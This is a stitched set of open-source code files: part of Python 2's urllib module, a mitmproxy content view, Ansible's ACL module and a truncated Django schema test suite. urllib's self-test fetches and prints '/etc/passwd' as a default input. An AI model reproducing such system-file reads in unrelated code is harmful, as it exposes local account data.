            proxyEnable = _winreg.QueryValueEx(internetSettings,
                                               'ProxyEnable')[0]
            if proxyEnable:
                # Returned as Unicode but problems if not converted to ASCII
                proxyServer = str(_winreg.QueryValueEx(internetSettings,
                                                       'ProxyServer')[0])
                if '=' in proxyServer:
                    # Per-protocol settings
                    for p in proxyServer.split(';'):
                        protocol, address = p.split('=', 1)
                        # See if address has a type:// prefix
                        import re
                        if not re.match('^([^/:]+)://', address):
                            address = '%s://%s' % (protocol, address)
                        proxies[protocol] = address
                else:
                    # Use one setting for all protocols
                    if proxyServer[:5] == 'http:':
                        proxies['http'] = proxyServer
                    else:
                        proxies['http'] = 'http://%s' % proxyServer
                        proxies['ftp'] = 'ftp://%s' % proxyServer
            internetSettings.Close()
        except (WindowsError, ValueError, TypeError):
            # Either registry key not found etc, or the value in an
            # unexpected format.
            # proxies already set up to be empty so nothing to do
            pass
        return proxies

    def getproxies():
        """Return a dictionary of scheme -> proxy server URL mappings.

        Returns settings gathered from the environment, if specified,
        or the registry.

        """
        return getproxies_environment() or getproxies_registry()

    def proxy_bypass_registry(host):
        """Return 1 if *host* matches the registry ProxyOverride list."""
        try:
            import _winreg
            import re
        except ImportError:
            # Std modules, so should be around - but you never know!
            return 0
        try:
            internetSettings = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER,
                r'Software\Microsoft\Windows\CurrentVersion\Internet Settings')
            proxyEnable = _winreg.QueryValueEx(internetSettings,
                                               'ProxyEnable')[0]
            proxyOverride = str(_winreg.QueryValueEx(internetSettings,
                                                     'ProxyOverride')[0])
            # ^^^^ Returned as Unicode but problems if not converted to ASCII
        except WindowsError:
            return 0
        if not proxyEnable or not proxyOverride:
            return 0
        # try to make a host list from name and IP address.
        rawHost, port = splitport(host)
        host = [rawHost]
        try:
            addr = socket.gethostbyname(rawHost)
            if addr != rawHost:
                host.append(addr)
        except socket.error:
            pass
        try:
            fqdn = socket.getfqdn(rawHost)
            if fqdn != rawHost:
                host.append(fqdn)
        except socket.error:
            pass
        # make a check value list from the registry entry: replace the
        # '<local>' string by the localhost entry and the corresponding
        # canonical entry.
        proxyOverride = proxyOverride.split(';')
        i = 0
        while i < len(proxyOverride):
            if proxyOverride[i] == '<local>':
                proxyOverride[i:i+1] = ['localhost',
                                        '127.0.0.1',
                                        socket.gethostname(),
                                        socket.gethostbyname(
                                            socket.gethostname())]
            i += 1
        # print proxyOverride
        # now check if we match one of the registry values.
        for test in proxyOverride:
            test = test.replace(".", r"\.")     # mask dots
            test = test.replace("*", r".*")     # change glob sequence
            test = test.replace("?", r".")      # change glob char
            for val in host:
                # print "%s <--> %s" %( test, val )
                if re.match(test, val, re.I):
                    return 1
        return 0

    def proxy_bypass(host):
        """Return 1 if *host* should be accessed without a proxy.

        Decides from the no_proxy environment setting when any proxy
        environment variables are present, otherwise from the registry.
        (NOTE(review): the original docstring wrongly described this as
        returning a proxy mapping.)

        """
        if getproxies_environment():
            return proxy_bypass_environment(host)
        else:
            return proxy_bypass_registry(host)

else:
    # By default use environment variables
    getproxies = getproxies_environment
    proxy_bypass = proxy_bypass_environment

# Test and time quote() and unquote()
def test1():
    # Round-trip every byte value through quote()/unquote() and time it.
    s = ''
    for i in range(256): s = s + chr(i)
    s = s*4
    t0 = time.time()
    qs = quote(s)
    uqs = unquote(qs)
    t1 = time.time()
    if uqs != s:
        print 'Wrong!'
    print repr(s)
    print repr(qs)
    print repr(uqs)
    print round(t1 - t0, 3), 'sec'


def reporthook(blocknum, blocksize, totalsize):
    # Report during remote transfers
    print "Block number: %d, Block size: %d, Total size: %d" % (
        blocknum, blocksize, totalsize)

# Test program
def test(args=[]):
    # Fetch each URL (or a default sample set), print headers and body.
    if not args:
        args = [
            '/etc/passwd',
            'file:/etc/passwd',
            'file://localhost/etc/passwd',
            'ftp://ftp.gnu.org/pub/README',
            'http://www.python.org/index.html',
            ]
        if hasattr(URLopener, "open_https"):
            args.append('https://synergy.as.cmu.edu/~geek/')
    try:
        for url in args:
            print '-'*10, url, '-'*10
            fn, h = urlretrieve(url, None, reporthook)
            print fn
            if h:
                print '======'
                for k in h.keys(): print k + ':', h[k]
                print '======'
            fp = open(fn, 'rb')
            data = fp.read()
            del fp
            if '\r' in data:
                # Strip carriage returns for display.
                table = string.maketrans("", "")
                data = data.translate(table, "\r")
            print data
            fn, h = None, None
            print '-'*40
    finally:
        urlcleanup()

def main():
    # Command-line driver: -t runs the self-test(s), otherwise each URL
    # argument is fetched and printed.
    import getopt, sys
    try:
        opts, args = getopt.getopt(sys.argv[1:], "th")
    except getopt.error, msg:
        print msg
        print "Use -h for help"
        return
    t = 0
    for o, a in opts:
        if o == '-t':
            t = t + 1
        if o == '-h':
            print "Usage: python urllib.py [-t] [url ...]"
            print "-t runs self-test;",
            print "otherwise, contents of urls are printed"
            return
    if t:
        if t > 1:
            test1()
        test(args)
    else:
        if not args:
            print "Use -h for help"
        for url in args:
            print urlopen(url).read(),

# Run test program when run as a script
if __name__ == '__main__':
    main()
apache-2.0
mhils/mitmproxy
mitmproxy/contentviews/auto.py
1
1091
from mitmproxy import contentviews
from mitmproxy.net import http
from mitmproxy.utils import strutils

from . import base


class ViewAuto(base.View):
    """Best-guess content view.

    Picks the most specific registered view for the message body:

    1. An exact content-type match from ``contentviews.content_types_map``.
    2. XML/HTML or image heuristics based on the parsed content type.
    3. A "Query" view when query metadata is present.
    4. Hex for mostly-binary payloads, Raw otherwise, and a stub for
       empty bodies.
    """
    name = "Auto"

    def __call__(self, data, **metadata):
        """Render *data* with the most appropriate view.

        ``metadata`` may carry ``headers`` (a mapping with an optional
        ``content-type`` entry) and ``query``; both are optional.
        Returns whatever the delegated view returns: a
        ``(description, generator)`` pair.
        """
        headers = metadata.get("headers", {})
        ctype = headers.get("content-type")
        if data and ctype:
            # parse_content_type returns None for malformed headers; the
            # original code dereferenced the result unconditionally and
            # raised TypeError on such input. Fall through to the generic
            # heuristics instead of crashing.
            parsed = http.parse_content_type(ctype)
            if parsed:
                ct = "{}/{}".format(parsed[0], parsed[1])
                if ct in contentviews.content_types_map:
                    return contentviews.content_types_map[ct][0](data, **metadata)
                elif strutils.is_xml(data):
                    return contentviews.get("XML/HTML")(data, **metadata)
                elif ct.startswith("image/"):
                    return contentviews.get("Image")(data, **metadata)
        if metadata.get("query"):
            return contentviews.get("Query")(data, **metadata)
        if data and strutils.is_mostly_bin(data):
            return contentviews.get("Hex")(data)
        if not data:
            return "No content", []
        return contentviews.get("Raw")(data)
mit
supertom/ansible-modules-core
files/acl.py
17
11212
#!/usr/bin/python
# -*- coding: utf-8 -*-

# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible.  If not, see <http://www.gnu.org/licenses/>.

DOCUMENTATION = '''
---
module: acl
version_added: "1.4"
short_description: Sets and retrieves file ACL information.
description:
    - Sets and retrieves file ACL information.
options:
  name:
    required: true
    default: null
    description:
      - The full path of the file or object.
    aliases: ['path']

  state:
    required: false
    default: query
    choices: [ 'query', 'present', 'absent' ]
    description:
      - defines whether the ACL should be present or not.  The C(query) state gets the current acl without changing it, for use in 'register' operations.

  follow:
    required: false
    default: yes
    choices: [ 'yes', 'no' ]
    description:
      - whether to follow symlinks on the path if a symlink is encountered.

  default:
    version_added: "1.5"
    required: false
    default: no
    choices: [ 'yes', 'no' ]
    description:
      - if the target is a directory, setting this to yes will make it the default acl for entities created inside the directory. It causes an error if name is a file.

  entity:
    version_added: "1.5"
    required: false
    description:
      - actual user or group that the ACL applies to when matching entity types user or group are selected.

  etype:
    version_added: "1.5"
    required: false
    default: null
    choices: [ 'user', 'group', 'mask', 'other' ]
    description:
      - the entity type of the ACL to apply, see setfacl documentation for more info.

  permissions:
    version_added: "1.5"
    required: false
    default: null
    description:
      - Permissions to apply/remove can be any combination of r, w and x (read, write and execute respectively)

  entry:
    required: false
    default: null
    description:
      - DEPRECATED. The acl to set or remove. This must always be quoted in the form of '<etype>:<qualifier>:<perms>'. The qualifier may be empty for some types, but the type and perms are always requried. '-' can be used as placeholder when you do not care about permissions. This is now superseded by entity, type and permissions fields.

  recursive:
    version_added: "2.0"
    required: false
    default: no
    choices: [ 'yes', 'no' ]
    description:
      - Recursively sets the specified ACL (added in Ansible 2.0). Incompatible with C(state=query).
author:
    - "Brian Coca (@bcoca)"
    - "Jérémie Astori (@astorije)"
notes:
    - The "acl" module requires that acls are enabled on the target filesystem and that the setfacl and getfacl binaries are installed.
    - As of Ansible 2.0, this module only supports Linux distributions.
'''

EXAMPLES = '''
# Grant user Joe read access to a file
- acl: name=/etc/foo.conf entity=joe etype=user permissions="r" state=present

# Removes the acl for Joe on a specific file
- acl: name=/etc/foo.conf entity=joe etype=user state=absent

# Sets default acl for joe on foo.d
- acl: name=/etc/foo.d entity=joe etype=user permissions=rw default=yes state=present

# Same as previous but using entry shorthand
- acl: name=/etc/foo.d entry="default:user:joe:rw-" state=present

# Obtain the acl for a specific file
- acl: name=/etc/foo.conf
  register: acl_info
'''

RETURN = '''
acl:
    description: Current acl on provided path (after changes, if any)
    returned: success
    type: list
    sample: [ "user::rwx", "group::rwx", "other::rwx" ]
'''


def split_entry(entry):
    '''Split a textual acl entry into its parts.

    Returns a ``[default, etype, entity, permissions]`` list where
    ``default`` is True when the entry carried a leading "default:"
    marker (and None otherwise), ``etype`` is one of the canonical
    entity-type names (or None when unrecognised), and ``permissions``
    is None when the entry had no permissions section.
    '''
    a = entry.split(':')

    d = None
    # A leading "d"/"default" section marks a default ACL; strip it so
    # the remaining sections line up as type:entity:perms.
    if entry.lower().startswith("d"):
        d = True
        a.pop(0)

    # Entries of the form "type:entity" (no perms) are padded so the
    # three-way unpack below always works.
    if len(a) == 2:
        a.append(None)

    t, e, p = a
    t = t.lower()

    # Normalise abbreviated entity types to their canonical names.
    if t.startswith("u"):
        t = "user"
    elif t.startswith("g"):
        t = "group"
    elif t.startswith("m"):
        t = "mask"
    elif t.startswith("o"):
        t = "other"
    else:
        t = None

    return [d, t, e, p]


def build_entry(etype, entity, permissions=None, use_nfsv4_acls=False):
    '''Build and return an entry string.

    Does not include the permissions bit if they are not provided.
    '''
    if use_nfsv4_acls:
        # NFSv4 entries end with an explicit "allow" action.  Skip the
        # permissions section when it was not supplied — joining None
        # would raise TypeError (this previously crashed for
        # state=absent with use_nfsv4_acls=yes).
        parts = [etype, entity, permissions, 'allow']
        return ':'.join(p for p in parts if p is not None)

    if permissions:
        return etype + ':' + entity + ':' + permissions
    else:
        return etype + ':' + entity


def build_command(module, mode, path, follow, default, recursive, entry=''):
    '''Build and return a getfacl/setfacl command as an argv-style list.'''
    if mode == 'set':
        cmd = [module.get_bin_path('setfacl', True)]
        cmd.append('-m "%s"' % entry)
    elif mode == 'rm':
        cmd = [module.get_bin_path('setfacl', True)]
        cmd.append('-x "%s"' % entry)
    else:  # mode == 'get'
        cmd = [module.get_bin_path('getfacl', True)]
        # prevents absolute path warnings and removes headers
        if get_platform().lower() == 'linux':
            cmd.append('--omit-header')
            cmd.append('--absolute-names')

    if recursive:
        cmd.append('--recursive')

    if not follow:
        if get_platform().lower() == 'linux':
            cmd.append('--physical')
        elif get_platform().lower() == 'freebsd':
            cmd.append('-h')

    if default:
        # -k removes default ACLs; -d restricts set/get to default ACLs.
        if mode == 'rm':
            cmd.insert(1, '-k')
        else:  # mode == 'set' or mode == 'get'
            cmd.insert(1, '-d')

    cmd.append(path)
    return cmd


def acl_changed(module, cmd):
    '''Return True if the provided command affects the existing ACLs,
    False otherwise.'''
    # FreeBSD do not have a --test flag, so by default, it is safer to
    # always say "true"
    if get_platform().lower() == 'freebsd':
        return True

    cmd = cmd[:]  # lists are mutable so cmd would be overridden without this
    cmd.insert(1, '--test')
    lines = run_acl(module, cmd)

    # setfacl --test prints "*,*" at the end of lines that would not
    # change anything; any other line means a real change.
    for line in lines:
        if not line.endswith('*,*'):
            return True
    return False


def run_acl(module, cmd, check_rc=True):
    '''Run a getfacl/setfacl command and return its output lines,
    stripped of comment lines and of a single trailing empty line.'''
    try:
        (rc, out, err) = module.run_command(' '.join(cmd), check_rc=check_rc)
    except Exception:
        e = get_exception()
        module.fail_json(msg=e.strerror)

    lines = []
    for l in out.splitlines():
        if not l.startswith('#'):
            lines.append(l.strip())

    if lines and not lines[-1].split():
        # trim last line only when it is empty
        return lines[:-1]
    else:
        return lines


def main():
    module = AnsibleModule(
        argument_spec=dict(
            name=dict(required=True, aliases=['path'], type='path'),
            entry=dict(required=False, type='str'),
            entity=dict(required=False, type='str', default=''),
            etype=dict(
                required=False,
                choices=['other', 'user', 'group', 'mask'],
                type='str'
            ),
            permissions=dict(required=False, type='str'),
            state=dict(
                required=False,
                default='query',
                choices=['query', 'present', 'absent'],
                type='str'
            ),
            follow=dict(required=False, type='bool', default=True),
            default=dict(required=False, type='bool', default=False),
            recursive=dict(required=False, type='bool', default=False),
            use_nfsv4_acls=dict(required=False, type='bool', default=False)
        ),
        supports_check_mode=True,
    )

    if get_platform().lower() not in ['linux', 'freebsd']:
        module.fail_json(msg="The acl module is not available on this system.")

    path = module.params.get('name')
    entry = module.params.get('entry')
    entity = module.params.get('entity')
    etype = module.params.get('etype')
    permissions = module.params.get('permissions')
    state = module.params.get('state')
    follow = module.params.get('follow')
    default = module.params.get('default')
    recursive = module.params.get('recursive')
    use_nfsv4_acls = module.params.get('use_nfsv4_acls')

    if not os.path.exists(path):
        module.fail_json(msg="Path not found or not accessible.")

    if state == 'query' and recursive:
        module.fail_json(msg="'recursive' MUST NOT be set when 'state=query'.")

    # Parameter cross-validation for the entity/etype/permissions form.
    if not entry:
        if state == 'absent' and permissions:
            module.fail_json(msg="'permissions' MUST NOT be set when 'state=absent'.")

        if state == 'absent' and not entity:
            module.fail_json(msg="'entity' MUST be set when 'state=absent'.")

        if state in ['present', 'absent'] and not etype:
            module.fail_json(msg="'etype' MUST be set when 'state=%s'."
                                 % state)

    # Parameter cross-validation for the deprecated 'entry' shorthand.
    if entry:
        if etype or entity or permissions:
            module.fail_json(msg="'entry' MUST NOT be set when 'entity', 'etype' or 'permissions' are set.")

        if state == 'present' and not entry.count(":") in [2, 3]:
            module.fail_json(msg="'entry' MUST have 3 or 4 sections divided by ':' when 'state=present'.")

        if state == 'absent' and not entry.count(":") in [1, 2]:
            module.fail_json(msg="'entry' MUST have 2 or 3 sections divided by ':' when 'state=absent'.")

        if state == 'query':
            module.fail_json(msg="'entry' MUST NOT be set when 'state=query'.")

        default_flag, etype, entity, permissions = split_entry(entry)
        if default_flag is not None:
            default = default_flag

    if get_platform().lower() == 'freebsd':
        if recursive:
            module.fail_json(msg="recursive is not supported on that platform.")

    changed = False
    msg = ""

    if state == 'present':
        entry = build_entry(etype, entity, permissions, use_nfsv4_acls)
        command = build_command(
            module, 'set', path, follow,
            default, recursive, entry
        )
        changed = acl_changed(module, command)

        if changed and not module.check_mode:
            run_acl(module, command)
        msg = "%s is present" % entry

    elif state == 'absent':
        # NOTE: use_nfsv4_acls must be passed by keyword; the previous
        # positional call put the boolean into the 'permissions' slot,
        # producing entries like "user:joe:False".
        entry = build_entry(etype, entity, use_nfsv4_acls=use_nfsv4_acls)
        command = build_command(
            module, 'rm', path, follow,
            default, recursive, entry
        )
        changed = acl_changed(module, command)

        if changed and not module.check_mode:
            run_acl(module, command, False)
        msg = "%s is absent" % entry

    elif state == 'query':
        msg = "current acl"

    acl = run_acl(
        module,
        build_command(module, 'get', path, follow, default, recursive)
    )

    module.exit_json(changed=changed, msg=msg, acl=acl)


# import module snippets
from ansible.module_utils.basic import *

# Guarding the entry point keeps the module importable (e.g. by doc
# tooling) while preserving behaviour when Ansible executes it as a
# script.
if __name__ == '__main__':
    main()
gpl-3.0
ryangallen/django
tests/schema/tests.py
83
71412
import datetime import itertools import unittest from copy import copy from django.db import ( DatabaseError, IntegrityError, OperationalError, connection, ) from django.db.models import Model from django.db.models.deletion import CASCADE from django.db.models.fields import ( AutoField, BigIntegerField, BinaryField, BooleanField, CharField, DateField, DateTimeField, IntegerField, PositiveIntegerField, SlugField, TextField, TimeField, ) from django.db.models.fields.related import ( ForeignKey, ForeignObject, ManyToManyField, OneToOneField, ) from django.db.transaction import atomic from django.test import ( TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature, ) from .fields import ( CustomManyToManyField, InheritedManyToManyField, MediumBlobField, ) from .models import ( Author, AuthorWithDefaultHeight, AuthorWithEvenLongerName, Book, BookForeignObj, BookWeak, BookWithLongName, BookWithO2O, BookWithoutAuthor, BookWithSlug, IntegerPK, Note, NoteRename, Tag, TagIndexed, TagM2MTest, TagUniqueRename, Thing, UniqueTest, new_apps, ) class SchemaTests(TransactionTestCase): """ Tests that the schema-alteration code works correctly. Be aware that these tests are more liable than most to false results, as sometimes the code to check if a test has worked is almost as complex as the code it is testing. """ available_apps = [] models = [ Author, AuthorWithDefaultHeight, AuthorWithEvenLongerName, Book, BookWeak, BookWithLongName, BookWithO2O, BookWithSlug, IntegerPK, Note, Tag, TagIndexed, TagM2MTest, TagUniqueRename, Thing, UniqueTest, ] # Utility functions def setUp(self): # local_models should contain test dependent model classes that will be # automatically removed from the app cache on test tear down. 
self.local_models = [] def tearDown(self): # Delete any tables made for our models self.delete_tables() new_apps.clear_cache() for model in new_apps.get_models(): model._meta._expire_cache() if 'schema' in new_apps.all_models: for model in self.local_models: del new_apps.all_models['schema'][model._meta.model_name] def delete_tables(self): "Deletes all model tables for our models for a clean test environment" converter = connection.introspection.table_name_converter with connection.cursor() as cursor: connection.disable_constraint_checking() table_names = connection.introspection.table_names(cursor) for model in itertools.chain(SchemaTests.models, self.local_models): # Remove any M2M tables first for field in model._meta.local_many_to_many: with atomic(): tbl = converter(field.remote_field.through._meta.db_table) if tbl in table_names: cursor.execute(connection.schema_editor().sql_delete_table % { "table": connection.ops.quote_name(tbl), }) table_names.remove(tbl) # Then remove the main tables with atomic(): tbl = converter(model._meta.db_table) if tbl in table_names: cursor.execute(connection.schema_editor().sql_delete_table % { "table": connection.ops.quote_name(tbl), }) table_names.remove(tbl) connection.enable_constraint_checking() def column_classes(self, model): with connection.cursor() as cursor: columns = { d[0]: (connection.introspection.get_field_type(d[1], d), d) for d in connection.introspection.get_table_description( cursor, model._meta.db_table, ) } # SQLite has a different format for field_type for name, (type, desc) in columns.items(): if isinstance(type, tuple): columns[name] = (type[0], desc) # SQLite also doesn't error properly if not columns: raise DatabaseError("Table does not exist (empty pragma)") return columns def get_indexes(self, table): """ Get the indexes on the table using a new cursor. 
""" with connection.cursor() as cursor: return connection.introspection.get_indexes(cursor, table) def get_constraints(self, table): """ Get the constraints on a table using a new cursor. """ with connection.cursor() as cursor: return connection.introspection.get_constraints(cursor, table) # Tests def test_creation_deletion(self): """ Tries creating a model's table, and then deleting it. """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Check that it's there list(Author.objects.all()) # Clean up that table with connection.schema_editor() as editor: editor.delete_model(Author) # Check that it's gone self.assertRaises( DatabaseError, lambda: list(Author.objects.all()), ) @skipUnlessDBFeature('supports_foreign_keys') def test_fk(self): "Tests that creating tables out of FK order, then repointing, works" # Create the table with connection.schema_editor() as editor: editor.create_model(Book) editor.create_model(Author) editor.create_model(Tag) # Check that initial tables are there list(Author.objects.all()) list(Book.objects.all()) # Make sure the FK constraint is present with self.assertRaises(IntegrityError): Book.objects.create( author_id=1, title="Much Ado About Foreign Keys", pub_date=datetime.datetime.now(), ) # Repoint the FK constraint old_field = Book._meta.get_field("author") new_field = ForeignKey(Tag, CASCADE) new_field.set_attributes_from_name("author") with connection.schema_editor() as editor: editor.alter_field(Book, old_field, new_field, strict=True) # Make sure the new FK constraint is present constraints = self.get_constraints(Book._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["author_id"] and details['foreign_key']: self.assertEqual(details['foreign_key'], ('schema_tag', 'id')) break else: self.fail("No FK constraint for author_id found") @skipUnlessDBFeature('supports_foreign_keys') def test_fk_db_constraint(self): "Tests that the db_constraint parameter is 
respected" # Create the table with connection.schema_editor() as editor: editor.create_model(Tag) editor.create_model(Author) editor.create_model(BookWeak) # Check that initial tables are there list(Author.objects.all()) list(Tag.objects.all()) list(BookWeak.objects.all()) # Check that BookWeak doesn't have an FK constraint constraints = self.get_constraints(BookWeak._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["author_id"] and details['foreign_key']: self.fail("FK constraint for author_id found") # Make a db_constraint=False FK new_field = ForeignKey(Tag, CASCADE, db_constraint=False) new_field.set_attributes_from_name("tag") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Make sure no FK constraint is present constraints = self.get_constraints(Author._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["tag_id"] and details['foreign_key']: self.fail("FK constraint for tag_id found") # Alter to one with a constraint new_field2 = ForeignKey(Tag, CASCADE) new_field2.set_attributes_from_name("tag") with connection.schema_editor() as editor: editor.alter_field(Author, new_field, new_field2, strict=True) # Make sure the new FK constraint is present constraints = self.get_constraints(Author._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["tag_id"] and details['foreign_key']: self.assertEqual(details['foreign_key'], ('schema_tag', 'id')) break else: self.fail("No FK constraint for tag_id found") # Alter to one without a constraint again new_field2 = ForeignKey(Tag, CASCADE) new_field2.set_attributes_from_name("tag") with connection.schema_editor() as editor: editor.alter_field(Author, new_field2, new_field, strict=True) # Make sure no FK constraint is present constraints = self.get_constraints(Author._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["tag_id"] and details['foreign_key']: self.fail("FK 
constraint for tag_id found") def _test_m2m_db_constraint(self, M2MFieldClass): class LocalAuthorWithM2M(Model): name = CharField(max_length=255) class Meta: app_label = 'schema' apps = new_apps self.local_models = [LocalAuthorWithM2M] # Create the table with connection.schema_editor() as editor: editor.create_model(Tag) editor.create_model(LocalAuthorWithM2M) # Check that initial tables are there list(LocalAuthorWithM2M.objects.all()) list(Tag.objects.all()) # Make a db_constraint=False FK new_field = M2MFieldClass(Tag, related_name="authors", db_constraint=False) new_field.contribute_to_class(LocalAuthorWithM2M, "tags") # Add the field with connection.schema_editor() as editor: editor.add_field(LocalAuthorWithM2M, new_field) # Make sure no FK constraint is present constraints = self.get_constraints(new_field.remote_field.through._meta.db_table) for name, details in constraints.items(): if details['columns'] == ["tag_id"] and details['foreign_key']: self.fail("FK constraint for tag_id found") @skipUnlessDBFeature('supports_foreign_keys') def test_m2m_db_constraint(self): self._test_m2m_db_constraint(ManyToManyField) @skipUnlessDBFeature('supports_foreign_keys') def test_m2m_db_constraint_custom(self): self._test_m2m_db_constraint(CustomManyToManyField) @skipUnlessDBFeature('supports_foreign_keys') def test_m2m_db_constraint_inherited(self): self._test_m2m_db_constraint(InheritedManyToManyField) def test_add_field(self): """ Tests adding fields to models """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure there's no age field columns = self.column_classes(Author) self.assertNotIn("age", columns) # Add the new field new_field = IntegerField(null=True) new_field.set_attributes_from_name("age") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Ensure the field is right afterwards columns = self.column_classes(Author) self.assertEqual(columns['age'][0], "IntegerField") 
self.assertEqual(columns['age'][1][6], True) def test_add_field_temp_default(self): """ Tests adding fields to models with a temporary default """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure there's no age field columns = self.column_classes(Author) self.assertNotIn("age", columns) # Add some rows of data Author.objects.create(name="Andrew", height=30) Author.objects.create(name="Andrea") # Add a not-null field new_field = CharField(max_length=30, default="Godwin") new_field.set_attributes_from_name("surname") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Ensure the field is right afterwards columns = self.column_classes(Author) self.assertEqual(columns['surname'][0], "CharField") self.assertEqual(columns['surname'][1][6], connection.features.interprets_empty_strings_as_nulls) def test_add_field_temp_default_boolean(self): """ Tests adding fields to models with a temporary default where the default is False. (#21783) """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure there's no age field columns = self.column_classes(Author) self.assertNotIn("age", columns) # Add some rows of data Author.objects.create(name="Andrew", height=30) Author.objects.create(name="Andrea") # Add a not-null field new_field = BooleanField(default=False) new_field.set_attributes_from_name("awesome") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Ensure the field is right afterwards columns = self.column_classes(Author) # BooleanField are stored as TINYINT(1) on MySQL. 
field_type = columns['awesome'][0] self.assertEqual(field_type, connection.features.introspected_boolean_field_type(new_field, created_separately=True)) def test_add_field_default_transform(self): """ Tests adding fields to models with a default that is not directly valid in the database (#22581) """ class TestTransformField(IntegerField): # Weird field that saves the count of items in its value def get_default(self): return self.default def get_prep_value(self, value): if value is None: return 0 return len(value) # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Add some rows of data Author.objects.create(name="Andrew", height=30) Author.objects.create(name="Andrea") # Add the field with a default it needs to cast (to string in this case) new_field = TestTransformField(default={1: 2}) new_field.set_attributes_from_name("thing") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Ensure the field is there columns = self.column_classes(Author) field_type, field_info = columns['thing'] self.assertEqual(field_type, 'IntegerField') # Make sure the values were transformed correctly self.assertEqual(Author.objects.extra(where=["thing = 1"]).count(), 2) def test_add_field_binary(self): """ Tests binary fields get a sane default (#22851) """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Add the new field new_field = BinaryField(blank=True) new_field.set_attributes_from_name("bits") with connection.schema_editor() as editor: editor.add_field(Author, new_field) # Ensure the field is right afterwards columns = self.column_classes(Author) # MySQL annoyingly uses the same backend, so it'll come back as one of # these two types. self.assertIn(columns['bits'][0], ("BinaryField", "TextField")) @unittest.skipUnless(connection.vendor == 'mysql', "MySQL specific") def test_add_binaryfield_mediumblob(self): """ Test adding a custom-sized binary field on MySQL (#24846). 
""" # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Add the new field with default new_field = MediumBlobField(blank=True, default=b'123') new_field.set_attributes_from_name('bits') with connection.schema_editor() as editor: editor.add_field(Author, new_field) columns = self.column_classes(Author) # Introspection treats BLOBs as TextFields self.assertEqual(columns['bits'][0], "TextField") def test_alter(self): """ Tests simple altering of fields """ # Create the table with connection.schema_editor() as editor: editor.create_model(Author) # Ensure the field is right to begin with columns = self.column_classes(Author) self.assertEqual(columns['name'][0], "CharField") self.assertEqual(bool(columns['name'][1][6]), bool(connection.features.interprets_empty_strings_as_nulls)) # Alter the name field to a TextField old_field = Author._meta.get_field("name") new_field = TextField(null=True) new_field.set_attributes_from_name("name") with connection.schema_editor() as editor: editor.alter_field(Author, old_field, new_field, strict=True) # Ensure the field is right afterwards columns = self.column_classes(Author) self.assertEqual(columns['name'][0], "TextField") self.assertEqual(columns['name'][1][6], True) # Change nullability again new_field2 = TextField(null=False) new_field2.set_attributes_from_name("name") with connection.schema_editor() as editor: editor.alter_field(Author, new_field, new_field2, strict=True) # Ensure the field is right afterwards columns = self.column_classes(Author) self.assertEqual(columns['name'][0], "TextField") self.assertEqual(bool(columns['name'][1][6]), bool(connection.features.interprets_empty_strings_as_nulls)) def test_alter_text_field(self): # Regression for "BLOB/TEXT column 'info' can't have a default value") # on MySQL. 
# Create the table with connection.schema_editor() as editor: editor.create_model(Note) old_field = Note._meta.get_field("info") new_field = TextField(blank=True) new_field.set_attributes_from_name("info") with connection.schema_editor() as editor: editor.alter_field(Note, old_field, new_field, strict=True) def test_alter_text_field_to_date_field(self): """ #25002 - Test conversion of text field to date field. """ with connection.schema_editor() as editor: editor.create_model(Note) Note.objects.create(info='1988-05-05') old_field = Note._meta.get_field('info') new_field = DateField(blank=True) new_field.set_attributes_from_name('info') with connection.schema_editor() as editor: editor.alter_field(Note, old_field, new_field, strict=True) # Make sure the field isn't nullable columns = self.column_classes(Note) self.assertFalse(columns['info'][1][6]) def test_alter_text_field_to_datetime_field(self): """ #25002 - Test conversion of text field to datetime field. """ with connection.schema_editor() as editor: editor.create_model(Note) Note.objects.create(info='1988-05-05 3:16:17.4567') old_field = Note._meta.get_field('info') new_field = DateTimeField(blank=True) new_field.set_attributes_from_name('info') with connection.schema_editor() as editor: editor.alter_field(Note, old_field, new_field, strict=True) # Make sure the field isn't nullable columns = self.column_classes(Note) self.assertFalse(columns['info'][1][6]) def test_alter_text_field_to_time_field(self): """ #25002 - Test conversion of text field to time field. 
""" with connection.schema_editor() as editor: editor.create_model(Note) Note.objects.create(info='3:16:17.4567') old_field = Note._meta.get_field('info') new_field = TimeField(blank=True) new_field.set_attributes_from_name('info') with connection.schema_editor() as editor: editor.alter_field(Note, old_field, new_field, strict=True) # Make sure the field isn't nullable columns = self.column_classes(Note) self.assertFalse(columns['info'][1][6]) @skipIfDBFeature('interprets_empty_strings_as_nulls') def test_alter_textual_field_keep_null_status(self): """ Changing a field type shouldn't affect the not null status. """ with connection.schema_editor() as editor: editor.create_model(Note) with self.assertRaises(IntegrityError): Note.objects.create(info=None) old_field = Note._meta.get_field("info") new_field = CharField(max_length=50) new_field.set_attributes_from_name("info") with connection.schema_editor() as editor: editor.alter_field(Note, old_field, new_field, strict=True) with self.assertRaises(IntegrityError): Note.objects.create(info=None) def test_alter_numeric_field_keep_null_status(self): """ Changing a field type shouldn't affect the not null status. """ with connection.schema_editor() as editor: editor.create_model(UniqueTest) with self.assertRaises(IntegrityError): UniqueTest.objects.create(year=None, slug='aaa') old_field = UniqueTest._meta.get_field("year") new_field = BigIntegerField() new_field.set_attributes_from_name("year") with connection.schema_editor() as editor: 